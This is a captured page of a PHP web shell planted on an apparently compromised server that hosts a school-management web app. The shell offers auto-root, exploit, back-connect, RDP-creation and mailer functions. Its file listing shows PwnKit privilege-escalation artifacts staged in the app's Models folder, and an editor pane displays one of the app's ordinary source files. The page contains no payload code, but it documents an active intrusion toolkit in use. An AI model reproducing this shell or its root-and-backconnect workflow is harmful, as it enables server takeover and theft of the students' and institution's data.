Linux srv1.sbit.com.bd 5.14.0-503.21.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Sun Jan 12 09:45:05 EST 2025 x86_64
Apache
: 192.99.39.68 | : 216.73.216.165
Cant Read [ /etc/named.conf ]
8.2.29
gzmcfenigov
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
gzmcfenigov /
public_html /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
BaseModel.php
455
B
-rw-rw-rw-
ColumnWiseFeeSetups.php
1.59
KB
-rw-rw-rw-
ComplaintDetails.php
217
B
-rw-r--r--
InternalResults.php
216
B
-rw-r--r--
MarksEntry.php
295
B
-rw-rw-rw-
Menu.php
1.24
KB
-rw-rw-rw-
MenuAction.php
246
B
-rw-rw-rw-
ModelHasPermission.php
189
B
-rw-rw-rw-
OtpSms.php
189
B
-rw-rw-rw-
Permission.php
215
B
-rw-rw-rw-
PreviousClassInfo.php
218
B
-rw-rw-rw-
PublicExamResult.php
217
B
-rw-r--r--
Role.php
368
B
-rw-rw-rw-
RoleHasPermission.php
188
B
-rw-rw-rw-
ServiceCenter.php
214
B
-rw-r--r--
StudentAccountInfo.php
2.77
KB
-rw-rw-rw-
StudentAdmission.php
216
B
-rw-rw-rw-
Testimonial.php
270
B
-rw-rw-rw-
User.php
1.36
KB
-rw-rw-rw-
UserMenuAction.php
1.22
KB
-rw-rw-rw-
add_exam_type.php
659
B
-rw-rw-rw-
add_fee_title.php
1.75
KB
-rw-rw-rw-
add_noc.php
208
B
-rw-rw-rw-
bank_info.php
497
B
-rw-rw-rw-
bank_transaction_entry.php
1.54
KB
-rw-rw-rw-
cash_receiver_info.php
399
B
-rw-rw-rw-
cash_transaction.php
2.98
KB
-rw-rw-rw-
character_certificate.php
280
B
-rw-rw-rw-
class_info.php
671
B
-rw-rw-rw-
class_wise_student_info.php
224
B
-rw-rw-rw-
country_information.php
277
B
-rw-rw-rw-
district_information.php
278
B
-rw-rw-rw-
division_information.php
278
B
-rw-rw-rw-
expense_column.php
272
B
-rw-rw-rw-
expense_entry.php
272
B
-rw-rw-rw-
gender_wise.php
211
B
-rw-rw-rw-
group_info.php
247
B
-rw-rw-rw-
income_expense.php
272
B
-rw-rw-rw-
institute_position_details.php
226
B
-rw-rw-rw-
marks_distribution.php
276
B
-rw-rw-rw-
marksheet.php
210
B
-rw-rw-rw-
mpoNationalizatio.php
274
B
-rw-rw-rw-
mujib_corner_photos.php
190
B
-rw-rw-rw-
online_lecture_upload.php
222
B
-rw-rw-rw-
others_income.php
281
B
-rw-rw-rw-
others_income_entry.php
278
B
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
section_info.php
309
B
-rw-rw-rw-
section_wise.php
216
B
-rw-rw-rw-
session.php
333
B
-rw-rw-rw-
studentAttendanceInfo.php
222
B
-rw-rw-rw-
student_certificate.php
278
B
-rw-rw-rw-
student_fee_column.php
342
B
-rw-rw-rw-
student_information.php
391
B
-rw-rw-rw-
student_reg_info.php
1.09
KB
-rw-rw-rw-
student_registration.php
221
B
-rw-rw-rw-
subject_info.php
499
B
-rw-rw-rw-
subject_part.php
577
B
-rw-rw-rw-
subject_reg_info.php
217
B
-rw-rw-rw-
supplier_info.php
391
B
-rw-rw-rw-
supplier_payment.php
715
B
-rw-rw-rw-
supplier_statement.php
190
B
-rw-rw-rw-
teaching_permission.php
278
B
-rw-rw-rw-
upazila_information.php
219
B
-rw-rw-rw-
upload_download_file.php
221
B
-rw-rw-rw-
vice_principal_message.php
223
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bank_transaction_entry.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; use Illuminate\Database\Eloquent\SoftDeletes; use App\Traits\DateFormat; class bank_transaction_entry extends Model { use HasFactory,SoftDeletes; protected $guarded = []; public function admin() { return $this->belongsTo('App\Models\User','admin_id'); } public static function findData($bank_id, $type, $request_date, $request_from_date = NULL, $request_to_date = NULL, $month = NULL, $year = NULL) { if($type == 'All') { $data = bank_transaction_entry::where('bank_id',$bank_id)->get(); } elseif($type == 'Daily') { $date = DateFormat::DateToDb('/',$request_date); $data = bank_transaction_entry::where('bank_id',$bank_id)->where('date',$date)->get(); } elseif($type == 'DateToDate') { $from_date = DateFormat::DateToDb('/',$request_from_date); $to_date = DateFormat::DateToDb('/',$request_to_date); $data = bank_transaction_entry::where('bank_id',$bank_id)->whereBetween('date',[$from_date,$to_date])->get(); } elseif($type == 'Monthly') { $data = bank_transaction_entry::where('bank_id',$bank_id)->whereMonth('date',$month)->whereYear('date',$year)->get(); } else { $data = bank_transaction_entry::where('bank_id',$bank_id)->whereYear('date',$year)->get(); } return $data; } }
Close